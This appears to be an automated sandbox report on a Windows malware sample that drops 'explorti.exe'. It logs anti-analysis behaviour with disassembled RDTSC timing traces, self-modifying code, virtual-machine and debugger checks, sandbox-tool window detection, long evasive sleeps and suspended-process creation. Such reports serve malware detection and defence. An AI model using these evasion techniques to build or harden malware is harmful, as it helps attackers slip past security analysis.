Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 505088E second address: 50508E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 75C4B90Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov ecx, eax 0x0000000d jmp 00007F5F64D1DAC1h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 jmp 00007F5F64D1DAC7h 0x0000001a and ecx, 1Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5F64D1DAC5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000037 second address: 500003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500003D second address: 500006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov ax, di 0x0000000f jmp 00007F5F64D1DAC1h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DABDh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500006F second address: 50000CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007F5F64D1DF1Fh 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F5F64D1DF22h 0x0000001b call 00007F5F64D1DF22h 0x00000020 pop esi 0x00000021 popad 0x00000022 mov esi, ebx 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5F64D1DF23h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50000CE second address: 5000175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push esi 0x0000000c mov edx, 6FC5F4DEh 0x00000011 pop edi 0x00000012 pushfd 0x00000013 jmp 00007F5F64D1DAC4h 0x00000018 jmp 00007F5F64D1DAC5h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 jmp 00007F5F64D1DABCh 0x00000026 mov si, F7A1h 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F5F64D1DAC7h 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 pushad 0x00000034 mov ecx, 0D11DA81h 0x00000039 popad 0x0000003a movsx edi, si 0x0000003d popad 0x0000003e mov ebx, dword ptr [ebp+10h] 0x00000041 jmp 00007F5F64D1DAC4h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a mov ebx, esi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000175 second address: 5000214 instructions: 0x00000000 rdtsc 0x00000002 mov ch, DEh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5F64D1DF25h 0x0000000c adc cl, FFFFFFE6h 0x0000000f jmp 00007F5F64D1DF21h 0x00000014 popfd 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov si, dx 0x0000001b movsx ebx, si 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 mov esi, 2A735907h 0x00000026 mov ax, 7EA3h 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+08h] 0x0000002e pushad 0x0000002f call 00007F5F64D1DF24h 0x00000034 pushad 0x00000035 popad 0x00000036 pop ecx 0x00000037 mov ebx, 5453E294h 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov si, DAF5h 0x00000043 pushfd 0x00000044 jmp 00007F5F64D1DF22h 0x00000049 sub cl, 00000048h 0x0000004c jmp 00007F5F64D1DF1Bh 0x00000051 popfd 0x00000052 popad 0x00000053 mov dword ptr [esp], edi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov cl, dh 0x0000005b mov esi, 58F84E53h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000214 second address: 5000229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, D3h 0x00000005 mov ecx, 726C52A7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000229 second address: 500022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500022F second address: 5000235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000235 second address: 5000285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F5FD6C4C2D8h 0x00000011 pushad 0x00000012 mov al, CEh 0x00000014 popad 0x00000015 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001c jmp 00007F5F64D1DF25h 0x00000021 je 00007F5FD6C4C2C8h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000285 second address: 5000289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000289 second address: 500028F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500028F second address: 50002E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F5F64D1DAC0h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5F64D1DABDh 0x0000001d and si, C396h 0x00000022 jmp 00007F5F64D1DAC1h 0x00000027 popfd 0x00000028 mov eax, 32440807h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50002E9 second address: 500030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF1Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500030F second address: 500031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500031F second address: 5000323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000323 second address: 5000352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5FD6C4BE13h 0x0000000e jmp 00007F5F64D1DAC7h 0x00000013 test byte ptr [esi+48h], 00000001h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000352 second address: 5000356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000356 second address: 500035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500035C second address: 5000366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 04EFCBAFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000366 second address: 50003AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007F5FD6C4BDEAh 0x0000000d pushad 0x0000000e mov dx, ax 0x00000011 movzx esi, di 0x00000014 popad 0x00000015 test bl, 00000007h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F5F64D1DAC1h 0x00000021 sbb ax, C3C6h 0x00000026 jmp 00007F5F64D1DAC1h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0815 second address: 4FF082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 movsx edi, si 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov di, 8F7Ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0929 second address: 4FF09B0 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 207181C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DAC3h 0x00000012 jmp 00007F5F64D1DAC3h 0x00000017 popfd 0x00000018 jmp 00007F5F64D1DAC8h 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov esi, ebx 0x00000026 pushfd 0x00000027 jmp 00007F5F64D1DAC9h 0x0000002c sbb cx, 9DE6h 0x00000031 jmp 00007F5F64D1DAC1h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF09B0 second address: 4FF09FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DF1Dh 0x00000012 adc eax, 0250CDF6h 0x00000018 jmp 00007F5F64D1DF21h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 test esi, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx ebx, cx 0x00000029 push ecx 0x0000002a pop ebx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF09FC second address: 4FF0A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 23h 0x00000005 pushfd 0x00000006 jmp 00007F5F64D1DAC4h 0x0000000b add cl, 00000078h 0x0000000e jmp 00007F5F64D1DABBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F5FD6C5341Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov esi, edi 0x00000022 call 00007F5F64D1DAC7h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0A4C second address: 4FF0A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5F64D1DF27h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0A86 second address: 4FF0ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, F20Ah 0x00000007 movsx edx, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f pushad 0x00000010 call 00007F5F64D1DAC8h 0x00000015 movzx eax, bx 0x00000018 pop edx 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d je 00007F5FD6C533A3h 0x00000023 jmp 00007F5F64D1DABFh 0x00000028 test byte ptr [76FB6968h], 00000002h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 mov ah, bh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0ADA second address: 4FF0AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0AE0 second address: 4FF0B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5FD6C53384h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F5F64D1DAC7h 0x00000015 jmp 00007F5F64D1DAC3h 0x0000001a popfd 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 jmp 00007F5F64D1DAC0h 0x00000027 popad 0x00000028 push ebx 0x00000029 jmp 00007F5F64D1DABCh 0x0000002e mov dword ptr [esp], ebx 0x00000031 pushad 0x00000032 mov cl, B7h 0x00000034 mov esi, edx 0x00000036 popad 0x00000037 push ebp 0x00000038 pushad 0x00000039 mov eax, 5FC2C5A7h 0x0000003e movzx esi, di 0x00000041 popad 0x00000042 mov dword ptr [esp], ebx 0x00000045 jmp 00007F5F64D1DABFh 0x0000004a push dword ptr [ebp+14h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5F64D1DAC5h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0C2B second address: 4FF0C59 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DF20h 0x00000012 adc ah, 00000078h 0x00000015 jmp 00007F5F64D1DF1Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0C59 second address: 4FF0C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50009C1 second address: 50009EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DF1Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50806DA second address: 50806E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50806E0 second address: 50806E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Special instruction interceptor: First address: 73EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Special instruction interceptor: First address: 73EB40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Special instruction interceptor: First address: 73C70E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Special instruction interceptor: First address: 8DE5BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 77EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 77EB40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 77C70E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 91E5BC instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Code function: 0_2_05070205 rdtsc

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Window / User API: threadDelayed 394

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7976	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7976	Thread sleep time: -68034s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7996	Thread sleep time: -60030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8000	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8000	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7960	Thread sleep count: 394 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7960	Thread sleep time: -11820000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8076	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7960	Thread sleep time: -30000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: explorti.exe, explorti.exe, 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.0000000001238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: f3wrBtIYXx.exe, 00000000.00000002.1697951868.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1724071406.0000000000901000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1730181139.0000000000901000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Process information queried: ProcessInformation

Hides threads from debuggers

Anti Debugging

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Code function: 0_2_05070621 Start: 05070690 End: 0507068C

0_2_05070621

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Code function: 0_2_05070205 rdtsc

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0074645B mov eax, dword ptr fs:[00000030h]		7_2_0074645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0074A1C2 mov eax, dword ptr fs:[00000030h]		7_2_0074A1C2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Contains functionality to query CPU information (cpuid)

Source: explorti.exe	Binary or memory string: qMProgram Manager
Source: f3wrBtIYXx.exe, 00000000.00000002.1697951868.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1724071406.0000000000901000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1730181139.0000000000901000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: qMProgram Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0072D312 cpuid

7_2_0072D312

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation